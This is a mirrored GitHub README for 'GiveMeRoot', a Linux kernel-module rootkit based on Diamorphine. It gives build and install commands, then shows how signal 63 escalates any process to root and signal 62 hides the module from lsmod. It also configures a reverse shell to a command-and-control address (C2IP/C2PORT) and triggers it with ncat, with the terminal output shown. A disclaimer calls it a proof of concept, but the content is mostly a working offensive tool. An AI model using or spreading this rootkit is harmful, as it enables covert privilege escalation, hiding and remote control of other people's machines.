Giter Club home page Giter Club logo

givemeroot's Introduction

GiveMeRoot

Simple LKM rootkit based on Diamorphine.

Environment tested

  • Debian 9
  • Kernel 4.9.0-8-amd64

How it works

Basically the rootkit hooks the syscall kill, and whenever it receives a signal 63, the process is changed to run with root permissions.

Install

root@lkm:~/# git clone https://github.com/mthbernardes/givemeroot.git
root@lkm:~/# cd givemeroot
root@lkm:~/givemeroot# make
make -C /lib/modules/4.9.0-8-amd64/build M=/root/givemeroot modules
make[1]: Entering directory '/usr/src/linux-headers-4.9.0-8-amd64'
  Building modules, stage 2.
  MODPOST 1 modules
make[1]: Leaving directory '/usr/src/linux-headers-4.9.0-8-amd64'
root@lkm:~/givemeroot# insmod givemeroot.ko

Usage

Grant root access

nuvm@lkm:~$ id
uid=1001(nuvm) gid=1001(nuvm) groups=1001(nuvm),100(users)
nuvm@lkm:~$ kill -63 0
nuvm@lkm:~$ id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(nuvm)

Hide/ Unhide module

nuvm@lkm:~$ lsmod | grep givemeroot
nuvm@lkm:~$ kill -62 0
nuvm@lkm:~$ lsmod | grep givemeroot
givemeroot             16384  0
nuvm@lkm:~$ kill -62 0
nuvm@lkm:~$ lsmod | grep givemeroot

Reverse shell

Configuration

Just edit the global variables

#define C2IP    "192.168.0.60"
#define C2PORT  "9090"

and set your c2 hostname/ipaddr and port.

Usage

Start a listener on your c2

ncat -lvp 9090

and start a tcp connection from your c2 with the host running the rookit on port 1339 with port 1337 as source port ( the server does not need to be listening on this port)

ncat -p 1337 192.168.0.101 1339

then the host will connect to your c2 using ncat

Disclaimer

Using this module might cause severe damage to your system, it was created as a proof of concept and should never be used on a production system!

By using this software the person in question agrees that they will use any of software in question in an ethical (non-malicious) way and agrees that the developer(s) are NOT held responsible for any damage caused by the use and or abuse of this software.

Misuse of any software from this website may result in criminal charges brought against the person in question depending on the country or state of residence which can result in probation, fines up or prison sentences up to 20 years in federal prison.

givemeroot's People

Contributors

mthbernardes avatar

Watchers

James Cloos avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.